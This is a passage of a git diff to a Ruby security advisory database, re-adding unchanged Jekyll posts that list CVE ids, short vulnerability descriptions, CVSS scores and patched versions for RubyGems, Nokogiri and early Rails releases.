-  title: RubyGems vulnerability in the gem installer that allowed a malicious gem
-    to overwrite arbitrary files
-  date: 2017-08-29
-  description: |
-    RubyGems version 2.6.12 and earlier fails to validate specification names,
-    allowing a maliciously crafted gem to potentially overwrite any file on the
-    filesystem.
-  cvss_v2: 6.4
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 2.4.5.3"
-  - ">= 2.5.2.1"
-  - ">= 2.6.13"
----
+---
+layout: advisory
+title: 'CVE-2017-0901 (rubygems-update): RubyGems vulnerability in the gem installer
+  that allowed a malicious gem to overwrite arbitrary files'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2017-0901
+  ghsa: pm9x-4392-2c2p
+  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
+  title: RubyGems vulnerability in the gem installer that allowed a malicious gem
+    to overwrite arbitrary files
+  date: 2017-08-29
+  description: |
+    RubyGems version 2.6.12 and earlier fails to validate specification names,
+    allowing a maliciously crafted gem to potentially overwrite any file on the
+    filesystem.
+  cvss_v2: 6.4
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 2.4.5.3"
+  - ">= 2.5.2.1"
+  - ">= 2.6.13"
+---
diff --git a/advisories/_posts/2017-08-29-CVE-2017-0902.md b/advisories/_posts/2017-08-29-CVE-2017-0902.md
index fb55f641..39c24245 100644
--- a/advisories/_posts/2017-08-29-CVE-2017-0902.md
+++ b/advisories/_posts/2017-08-29-CVE-2017-0902.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2017-0902 (rubygems-update): RubyGems DNS request hijacking vulnerability'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2017-0902
-  ghsa: 73w7-6w9g-gc8w
-  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
-  title: RubyGems DNS request hijacking vulnerability
-  date: 2017-08-29
-  description: |
-    RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking
-    vulnerability that allows a MITM attacker to force the RubyGems client to
-    down load and install gems from a server that the attacker controls.
-  cvss_v2: 6.8
-  cvss_v3: 8.1
-  patched_versions:
-  - ">= 2.4.5.3"
-  - ">= 2.5.2.1"
-  - ">= 2.6.13"
----
+---
+layout: advisory
+title: 'CVE-2017-0902 (rubygems-update): RubyGems DNS request hijacking vulnerability'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2017-0902
+  ghsa: 73w7-6w9g-gc8w
+  url: https://blog.rubygems.org/2017/08/27/2.6.13-released.html
+  title: RubyGems DNS request hijacking vulnerability
+  date: 2017-08-29
+  description: |
+    RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking
+    vulnerability that allows a MITM attacker to force the RubyGems client to
+    down load and install gems from a server that the attacker controls.
+  cvss_v2: 6.8
+  cvss_v3: 8.1
+  patched_versions:
+  - ">= 2.4.5.3"
+  - ">= 2.5.2.1"
+  - ">= 2.6.13"
+---
diff --git a/advisories/_posts/2017-09-19-CVE-2017-9050.md b/advisories/_posts/2017-09-19-CVE-2017-9050.md
index 1246f8b8..03c9aa62 100644
--- a/advisories/_posts/2017-09-19-CVE-2017-9050.md
+++ b/advisories/_posts/2017-09-19-CVE-2017-9050.md
@@ -1,69 +1,69 @@
----
-layout: advisory
-title: 'CVE-2017-9050 (nokogiri): Nokogiri gem, via libxml, is affected by DoS and
-  RCE vulnerabilities'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2017-9050
-  ghsa: 8c56-cpmw-89x7
-  url: https://github.com/sparklemotion/nokogiri/issues/1673
-  title: Nokogiri gem, via libxml, is affected by DoS and RCE vulnerabilities
-  date: 2017-09-19
-  description: |
-    The version of libxml2 packaged with Nokogiri contains several
-    vulnerabilities. Nokogiri has mitigated these issues by upgrading to
-    libxml 2.9.5.
-
-    It was discovered that a type confusion error existed in libxml2. An
-    attacker could use this to specially construct XML data that
-    could cause a denial of service or possibly execute arbitrary
-    code. (CVE-2017-0663)
-
-    It was discovered that libxml2 did not properly validate parsed entity
-    references. An attacker could use this to specially construct XML
-    data that could expose sensitive information. (CVE-2017-7375)
-
-    It was discovered that a buffer overflow existed in libxml2 when
-    handling HTTP redirects. An attacker could use this to specially
-    construct XML data that could cause a denial of service or possibly
-    execute arbitrary code. (CVE-2017-7376)
-
-    Marcel Böhme and Van-Thuan Pham discovered a buffer overflow in
-    libxml2 when handling elements. An attacker could use this to specially
-    construct XML data that could cause a denial of service or possibly
-    execute arbitrary code. (CVE-2017-9047)
-
-    Marcel Böhme and Van-Thuan Pham discovered a buffer overread
-    in libxml2 when handling elements. An attacker could use this
-    to specially construct XML data that could cause a denial of
-    service. (CVE-2017-9048)
-
-    Marcel Böhme and Van-Thuan Pham discovered multiple buffer overreads
-    in libxml2 when handling parameter-entity references. An attacker
-    could use these to specially construct XML data that could cause a
-    denial of service. (CVE-2017-9049, CVE-2017-9050)
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.8.1"
-  related:
-    cve:
-    - 2017-0663
-    - 2017-7375
-    - 2017-7376
-    - 2017-9047
-    - 2017-9048
-    - 2017-9049
-    - 2017-9050
-    url:
-    - https://usn.ubuntu.com/usn/usn-3424-1/
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-0663.html
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7375.html
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7376.html
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9047.html
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9048.html
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9049.html
-    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9050.html
----
+---
+layout: advisory
+title: 'CVE-2017-9050 (nokogiri): Nokogiri gem, via libxml, is affected by DoS and
+  RCE vulnerabilities'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2017-9050
+  ghsa: 8c56-cpmw-89x7
+  url: https://github.com/sparklemotion/nokogiri/issues/1673
+  title: Nokogiri gem, via libxml, is affected by DoS and RCE vulnerabilities
+  date: 2017-09-19
+  description: |
+    The version of libxml2 packaged with Nokogiri contains several
+    vulnerabilities. Nokogiri has mitigated these issues by upgrading to
+    libxml 2.9.5.
+
+    It was discovered that a type confusion error existed in libxml2. An
+    attacker could use this to specially construct XML data that
+    could cause a denial of service or possibly execute arbitrary
+    code. (CVE-2017-0663)
+
+    It was discovered that libxml2 did not properly validate parsed entity
+    references. An attacker could use this to specially construct XML
+    data that could expose sensitive information. (CVE-2017-7375)
+
+    It was discovered that a buffer overflow existed in libxml2 when
+    handling HTTP redirects. An attacker could use this to specially
+    construct XML data that could cause a denial of service or possibly
+    execute arbitrary code. (CVE-2017-7376)
+
+    Marcel Böhme and Van-Thuan Pham discovered a buffer overflow in
+    libxml2 when handling elements. An attacker could use this to specially
+    construct XML data that could cause a denial of service or possibly
+    execute arbitrary code. (CVE-2017-9047)
+
+    Marcel Böhme and Van-Thuan Pham discovered a buffer overread
+    in libxml2 when handling elements. An attacker could use this
+    to specially construct XML data that could cause a denial of
+    service. (CVE-2017-9048)
+
+    Marcel Böhme and Van-Thuan Pham discovered multiple buffer overreads
+    in libxml2 when handling parameter-entity references. An attacker
+    could use these to specially construct XML data that could cause a
+    denial of service. (CVE-2017-9049, CVE-2017-9050)
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.8.1"
+  related:
+    cve:
+    - 2017-0663
+    - 2017-7375
+    - 2017-7376
+    - 2017-9047
+    - 2017-9048
+    - 2017-9049
+    - 2017-9050
+    url:
+    - https://usn.ubuntu.com/usn/usn-3424-1/
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-0663.html
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7375.html
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7376.html
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9047.html
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9048.html
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9049.html
+    - https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9050.html
+---
diff --git a/advisories/_posts/2017-10-09-CVE-2017-0903.md b/advisories/_posts/2017-10-09-CVE-2017-0903.md
index 5e28f9fd..1ed85f06 100644
--- a/advisories/_posts/2017-10-09-CVE-2017-0903.md
+++ b/advisories/_posts/2017-10-09-CVE-2017-0903.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2017-0903 (rubygems-update): Unsafe Object Deserialization Vulnerability
-  in RubyGems'
-comments: false
-categories:
-- rubygems-update
-- rubygems
-advisory:
-  gem: rubygems-update
-  library: rubygems
-  cve: 2017-0903
-  ghsa: mqwr-4qf2-2hcv
-  url: https://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
-  title: Unsafe Object Deserialization Vulnerability in RubyGems
-  date: 2017-10-09
-  description: |
-    There is a possible unsafe object deserialization vulnerability in RubyGems.
-    It is possible for YAML deserialization of gem specifications to bypass class
-    white lists. Specially crafted serialized objects can possibly be used to
-    escalate to remote code execution.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 2.0.0"
-  patched_versions:
-  - ">= 2.6.14"
----
+---
+layout: advisory
+title: 'CVE-2017-0903 (rubygems-update): Unsafe Object Deserialization Vulnerability
+  in RubyGems'
+comments: false
+categories:
+- rubygems-update
+- rubygems
+advisory:
+  gem: rubygems-update
+  library: rubygems
+  cve: 2017-0903
+  ghsa: mqwr-4qf2-2hcv
+  url: https://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
+  title: Unsafe Object Deserialization Vulnerability in RubyGems
+  date: 2017-10-09
+  description: |
+    There is a possible unsafe object deserialization vulnerability in RubyGems.
+    It is possible for YAML deserialization of gem specifications to bypass class
+    white lists. Specially crafted serialized objects can possibly be used to
+    escalate to remote code execution.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 2.0.0"
+  patched_versions:
+  - ">= 2.6.14"
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2006-4111.md b/advisories/_posts/2017-10-24-CVE-2006-4111.md
index b890be2f..18a32c41 100644
--- a/advisories/_posts/2017-10-24-CVE-2006-4111.md
+++ b/advisories/_posts/2017-10-24-CVE-2006-4111.md
@@ -1,32 +1,32 @@
----
-layout: advisory
-title: 'CVE-2006-4111 (rails): High severity vulnerability that affects rails'
-comments: false
-categories:
-- rails
-advisory:
-  gem: rails
-  cve: 2006-4111
-  ghsa: rvpq-5xqx-pfpp
-  url: https://github.com/presidentbeef/rails-security-history/blob/master/vulnerabilities.md
-  title: High severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Ruby on Rails before 1.1.5 allows remote attackers to execute Ruby code
-    with "severe" or "serious" impact via a File Upload request with an HTTP header
-    that modifies the LOAD_PATH variable, a different vulnerability than CVE-2006-4112.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 1.1.0"
-  patched_versions:
-  - ">= 1.1.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2006-4111
-    - https://github.com/presidentbeef/rails-security-history/blob/master/vulnerabilities.md
-    - https://blog.evanweaver.com/2006/08/12/anatomy-of-an-attack-against-1-1-4
-    - https://rubyonrails.org/2006/8/10/rails-1-1-6-backports-and-full-disclosure
-    - http://weblog.rubyonrails.org/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits
-    - https://github.com/advisories/GHSA-rvpq-5xqx-pfpp
-    - http://www.gentoo.org/security/en/glsa/glsa-200608-20.xml
----
+---
+layout: advisory
+title: 'CVE-2006-4111 (rails): High severity vulnerability that affects rails'
+comments: false
+categories:
+- rails
+advisory:
+  gem: rails
+  cve: 2006-4111
+  ghsa: rvpq-5xqx-pfpp
+  url: https://github.com/presidentbeef/rails-security-history/blob/master/vulnerabilities.md
+  title: High severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Ruby on Rails before 1.1.5 allows remote attackers to execute Ruby code
+    with "severe" or "serious" impact via a File Upload request with an HTTP header
+    that modifies the LOAD_PATH variable, a different vulnerability than CVE-2006-4112.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 1.1.0"
+  patched_versions:
+  - ">= 1.1.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2006-4111
+    - https://github.com/presidentbeef/rails-security-history/blob/master/vulnerabilities.md
+    - https://blog.evanweaver.com/2006/08/12/anatomy-of-an-attack-against-1-1-4
+    - https://rubyonrails.org/2006/8/10/rails-1-1-6-backports-and-full-disclosure
+    - http://weblog.rubyonrails.org/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits
+    - https://github.com/advisories/GHSA-rvpq-5xqx-pfpp
+    - http://www.gentoo.org/security/en/glsa/glsa-200608-20.xml
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2006-4112.md b/advisories/_posts/2017-10-24-CVE-2006-4112.md
index 7d6364bb..405b8426 100644
--- a/advisories/_posts/2017-10-24-CVE-2006-4112.md
+++ b/advisories/_posts/2017-10-24-CVE-2006-4112.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2006-4112 (rails): High severity vulnerability that affects rails.'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2006-4112
-  ghsa: 9wrq-xvmp-xjc8
-  url: https://exchange.xforce.ibmcloud.com/vulnerabilities/28364
-  title: High severity vulnerability that affects rails.
-  date: 2017-10-24
-  description: |
-    Unspecified vulnerability in the "dependency resolution mechanism" in
-    Ruby on Rails 1.1.0 through 1.1.5 allows remote attackers to execute arbitrary Ruby
-    code via a URL that is not properly handled in the routing code, which leads to
-    a denial of service (application hang) or "data loss," a different vulnerability
-    than CVE-2006-4111.
-  cvss_v2: 7.5
-  unaffected_versions:
-  - "< 1.1.0"
-  patched_versions:
-  - ">= 1.1.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2006-4112
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/28364
-    - https://github.com/advisories/GHSA-9wrq-xvmp-xjc8
-    - http://weblog.rubyonrails.org/2006/8/10/rails-1-1-6-backports-and-full-disclosure
-    - https://github.com/presidentbeef/rails-security-history/blob/master/vulnerabilities.md
-    - https://blog.evanweaver.com/2006/08/12/anatomy-of-an-attack-against-1-1-4
-    - http://weblog.rubyonrails.org/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits
-    - http://www.gentoo.org/security/en/glsa/glsa-200608-20.xml
-    - http://www.kb.cert.org/vuls/id/699540
----
+---
+layout: advisory
+title: 'CVE-2006-4112 (rails): High severity vulnerability that affects rails.'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2006-4112
+  ghsa: 9wrq-xvmp-xjc8
+  url: https://exchange.xforce.ibmcloud.com/vulnerabilities/28364
+  title: High severity vulnerability that affects rails.
+  date: 2017-10-24
+  description: |
+    Unspecified vulnerability in the "dependency resolution mechanism" in
+    Ruby on Rails 1.1.0 through 1.1.5 allows remote attackers to execute arbitrary Ruby
+    code via a URL that is not properly handled in the routing code, which leads to
+    a denial of service (application hang) or "data loss," a different vulnerability
+    than CVE-2006-4111.
+  cvss_v2: 7.5
+  unaffected_versions:
+  - "< 1.1.0"
+  patched_versions:
+  - ">= 1.1.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2006-4112
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/28364
+    - https://github.com/advisories/GHSA-9wrq-xvmp-xjc8
+    - http://weblog.rubyonrails.org/2006/8/10/rails-1-1-6-backports-and-full-disclosure
+    - https://github.com/presidentbeef/rails-security-history/blob/master/vulnerabilities.md
+    - https://blog.evanweaver.com/2006/08/12/anatomy-of-an-attack-against-1-1-4
+    - http://weblog.rubyonrails.org/2006/8/9/rails-1-1-5-mandatory-security-patch-and-other-tidbits
+    - http://www.gentoo.org/security/en/glsa/glsa-200608-20.xml
+    - http://www.kb.cert.org/vuls/id/699540
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2007-3227.md b/advisories/_posts/2017-10-24-CVE-2007-3227.md
index 24c0b233..9097deb8 100644
--- a/advisories/_posts/2017-10-24-CVE-2007-3227.md
+++ b/advisories/_posts/2017-10-24-CVE-2007-3227.md
@@ -1,33 +1,33 @@
----
-layout: advisory
-title: 'CVE-2007-3227 (rails): Moderate severity vulnerability that affects rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2007-3227
-  ghsa: gm25-fpmr-43fj
-  osvdb: 36378
-  url: http://weblog.rubyonrails.org/2007/10/12/rails-1-2-5-maintenance-release
-  title: Moderate severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in the to_json (ActiveRecord::Base#to_json)
-    function in Ruby on Rails before edge 9606 allows remote attackers to inject arbitrary
-    web script via the input values.
-  cvss_v2: 4.3
-  patched_versions:
-  - ">= 1.2.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2007-3227
-    - http://weblog.rubyonrails.org/2007/10/12/rails-1-2-5-maintenance-release
-    - http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
-    - https://github.com/advisories/GHSA-gm25-fpmr-43fj
-    - http://bugs.gentoo.org/show_bug.cgi?id=195315
-    - http://osvdb.org/36378
-    - http://security.gentoo.org/glsa/glsa-200711-17.xml
----
+---
+layout: advisory
+title: 'CVE-2007-3227 (rails): Moderate severity vulnerability that affects rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2007-3227
+  ghsa: gm25-fpmr-43fj
+  osvdb: 36378
+  url: http://weblog.rubyonrails.org/2007/10/12/rails-1-2-5-maintenance-release
+  title: Moderate severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in the to_json (ActiveRecord::Base#to_json)
+    function in Ruby on Rails before edge 9606 allows remote attackers to inject arbitrary
+    web script via the input values.
+  cvss_v2: 4.3
+  patched_versions:
+  - ">= 1.2.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-3227
+    - http://weblog.rubyonrails.org/2007/10/12/rails-1-2-5-maintenance-release
+    - http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
+    - https://github.com/advisories/GHSA-gm25-fpmr-43fj
+    - http://bugs.gentoo.org/show_bug.cgi?id=195315
+    - http://osvdb.org/36378
+    - http://security.gentoo.org/glsa/glsa-200711-17.xml
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2007-5379.md b/advisories/_posts/2017-10-24-CVE-2007-5379.md
index 759983d5..4fa90cb2 100644
--- a/advisories/_posts/2017-10-24-CVE-2007-5379.md
+++ b/advisories/_posts/2017-10-24-CVE-2007-5379.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2007-5379 (rails): Moderate severity vulnerability that affects rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2007-5379
-  osvdb: 40717
-  ghsa: fjfg-q662-gm6j
-  url: http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
-  title: Moderate severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Rails before 1.2.4, as used for Ruby on Rails, allows remote attackers
-    and ActiveResource servers to determine the existence of arbitrary files and read
-    arbitrary XML files via the Hash.from_xml (Hash#from_xml) method, which uses XmlSimple
-    (XML::Simple) unsafely, as demonstrated by reading passwords from the Pidgin (Gaim)
-    .purple/accounts.xml file.
-  cvss_v2: 5.0
-  patched_versions:
-  - ">= 1.2.5"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2007-5379
-    - http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
-    - https://github.com/advisories/GHSA-fjfg-q662-gm6j
-    - http://bugs.gentoo.org/show_bug.cgi?id=195315
-    - http://osvdb.org/40717
-    - http://security.gentoo.org/glsa/glsa-200711-17.xml
----
+---
+layout: advisory
+title: 'CVE-2007-5379 (rails): Moderate severity vulnerability that affects rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2007-5379
+  osvdb: 40717
+  ghsa: fjfg-q662-gm6j
+  url: http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
+  title: Moderate severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Rails before 1.2.4, as used for Ruby on Rails, allows remote attackers
+    and ActiveResource servers to determine the existence of arbitrary files and read
+    arbitrary XML files via the Hash.from_xml (Hash#from_xml) method, which uses XmlSimple
+    (XML::Simple) unsafely, as demonstrated by reading passwords from the Pidgin (Gaim)
+    .purple/accounts.xml file.
+  cvss_v2: 5.0
+  patched_versions:
+  - ">= 1.2.5"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-5379
+    - http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
+    - https://github.com/advisories/GHSA-fjfg-q662-gm6j
+    - http://bugs.gentoo.org/show_bug.cgi?id=195315
+    - http://osvdb.org/40717
+    - http://security.gentoo.org/glsa/glsa-200711-17.xml
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2007-5380.md b/advisories/_posts/2017-10-24-CVE-2007-5380.md
index 71e75f99..d4c7d9f7 100644
--- a/advisories/_posts/2017-10-24-CVE-2007-5380.md
+++ b/advisories/_posts/2017-10-24-CVE-2007-5380.md
@@ -1,30 +1,30 @@
----
-layout: advisory
-title: 'CVE-2007-5380 (rails): Moderate severity vulnerability that affects rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2007-5380
-  ghsa: jwhv-rgqc-fqj5
-  url: http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
-  title: Moderate severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Session fixation vulnerability in Rails before 1.2.4, as used for Ruby
-    on Rails, allows remote attackers to hijack web sessions via unspecified vectors
-    related to "URL-based sessions."
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 1.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2007-5380
-    - http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
-    - https://github.com/advisories/GHSA-jwhv-rgqc-fqj5
-    - http://bugs.gentoo.org/show_bug.cgi?id=195315
-    - http://security.gentoo.org/glsa/glsa-200711-17.xml
----
+---
+layout: advisory
+title: 'CVE-2007-5380 (rails): Moderate severity vulnerability that affects rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2007-5380
+  ghsa: jwhv-rgqc-fqj5
+  url: http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
+  title: Moderate severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Session fixation vulnerability in Rails before 1.2.4, as used for Ruby
+    on Rails, allows remote attackers to hijack web sessions via unspecified vectors
+    related to "URL-based sessions."
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 1.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-5380
+    - http://weblog.rubyonrails.org/2007/10/5/rails-1-2-4-maintenance-release
+    - https://github.com/advisories/GHSA-jwhv-rgqc-fqj5
+    - http://bugs.gentoo.org/show_bug.cgi?id=195315
+    - http://security.gentoo.org/glsa/glsa-200711-17.xml
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2007-6077.md b/advisories/_posts/2017-10-24-CVE-2007-6077.md
index 1a365f75..3f73f254 100644
--- a/advisories/_posts/2017-10-24-CVE-2007-6077.md
+++ b/advisories/_posts/2017-10-24-CVE-2007-6077.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2007-6077 (rails): Moderate severity vulnerability that affects rails'
-comments: false
-categories:
-- rails
-- rails
-advisory:
-  gem: rails
-  framework: rails
-  cve: 2007-6077
-  ghsa: p4c6-77gc-694x
-  url: https://rubyonrails.org/2007/11/24/ruby-on-rails-1-2-6-security-and-maintenance-release
-  title: Moderate severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    The session fixation protection mechanism in cgi_process.rb in
-    Rails 1.2.4, as used in Ruby on Rails, removes the :cookie_only
-    attribute from the DEFAULT_SESSION_OPTIONS constant, which
-    effectively causes cookie_only to be applied only to the first
-    instantiation of CgiRequest, which allows remote attackers to
-    conduct session fixation attacks.
-
-    NOTE: this is due to an incomplete fix for CVE-2007-5380.
-  cvss_v2: 6.8
-  patched_versions:
-  - ">= 1.2.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2007-6077
-    - http://weblog.rubyonrails.org/2007/11/24/ruby-on-rails-1-2-6-security-and-maintenance-release
-    - https://github.com/advisories/GHSA-p4c6-77gc-694x
-    - https://ubuntu.com/security/CVE-2007-6077
----
+---
+layout: advisory
+title: 'CVE-2007-6077 (rails): Moderate severity vulnerability that affects rails'
+comments: false
+categories:
+- rails
+- rails
+advisory:
+  gem: rails
+  framework: rails
+  cve: 2007-6077
+  ghsa: p4c6-77gc-694x
+  url: https://rubyonrails.org/2007/11/24/ruby-on-rails-1-2-6-security-and-maintenance-release
+  title: Moderate severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    The session fixation protection mechanism in cgi_process.rb in
+    Rails 1.2.4, as used in Ruby on Rails, removes the :cookie_only
+    attribute from the DEFAULT_SESSION_OPTIONS constant, which
+    effectively causes cookie_only to be applied only to the first
+    instantiation of CgiRequest, which allows remote attackers to
+    conduct session fixation attacks.
+
+    NOTE: this is due to an incomplete fix for CVE-2007-5380.
+  cvss_v2: 6.8
+  patched_versions:
+  - ">= 1.2.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-6077
+    - http://weblog.rubyonrails.org/2007/11/24/ruby-on-rails-1-2-6-security-and-maintenance-release
+    - https://github.com/advisories/GHSA-p4c6-77gc-694x
+    - https://ubuntu.com/security/CVE-2007-6077
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2008-4094.md b/advisories/_posts/2017-10-24-CVE-2008-4094.md
index c143b5cf..502338c1 100644
--- a/advisories/_posts/2017-10-24-CVE-2008-4094.md
+++ b/advisories/_posts/2017-10-24-CVE-2008-4094.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2008-4094 (activerecord): High severity vulnerability that affects rails'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2008-4094
-  ghsa: xf96-32q2-9rw2
-  url: http://www.rorsecurity.info/2008/09/08/sql-injection-issue-in-limit-and-offset-parameter
-  title: High severity vulnerability that affects rails
-  date: 2017-10-24
-  description: |
-    Multiple SQL injection vulnerabilities in Ruby on Rails before 2.1.1
-    allow remote attackers to execute arbitrary SQL commands via the
-    (1) :limit and (2) :offset parameters, related to ActiveRecord,
-    ActiveSupport, ActiveResource, ActionPack, and ActionMailer.
-  cvss_v2: 7.5
-  patched_versions:
-  - "~> 2.0.0"
-  - ">= 2.1.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2008-4094
-    - http://www.rorsecurity.info/2008/09/08/sql-injection-issue-in-limit-and-offset-parameter
-    - https://rubyonrails.org/2008/10/23/rails-2-1-2-security-other-fixes
-    - https://github.com/rails/rails/commit/213f31513e4cb640fa3ed45f387f221401023646
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/45109
-    - https://github.com/advisories/GHSA-xf96-32q2-9rw2
-    - http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00002.html
-    - http://rails.lighthouseapp.com/projects/8994/tickets/288
-    - http://rails.lighthouseapp.com/projects/8994/tickets/964
-    - http://www.openwall.com/lists/oss-security/2008/09/13/2
-    - http://www.openwall.com/lists/oss-security/2008/09/16/1
----
+---
+layout: advisory
+title: 'CVE-2008-4094 (activerecord): High severity vulnerability that affects rails'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2008-4094
+  ghsa: xf96-32q2-9rw2
+  url: http://www.rorsecurity.info/2008/09/08/sql-injection-issue-in-limit-and-offset-parameter
+  title: High severity vulnerability that affects rails
+  date: 2017-10-24
+  description: |
+    Multiple SQL injection vulnerabilities in Ruby on Rails before 2.1.1
+    allow remote attackers to execute arbitrary SQL commands via the
+    (1) :limit and (2) :offset parameters, related to ActiveRecord,
+    ActiveSupport, ActiveResource, ActionPack, and ActionMailer.
+  cvss_v2: 7.5
+  patched_versions:
+  - "~> 2.0.0"
+  - ">= 2.1.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2008-4094
+    - http://www.rorsecurity.info/2008/09/08/sql-injection-issue-in-limit-and-offset-parameter
+    - https://rubyonrails.org/2008/10/23/rails-2-1-2-security-other-fixes
+    - https://github.com/rails/rails/commit/213f31513e4cb640fa3ed45f387f221401023646
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/45109
+    - https://github.com/advisories/GHSA-xf96-32q2-9rw2
+    - http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00002.html
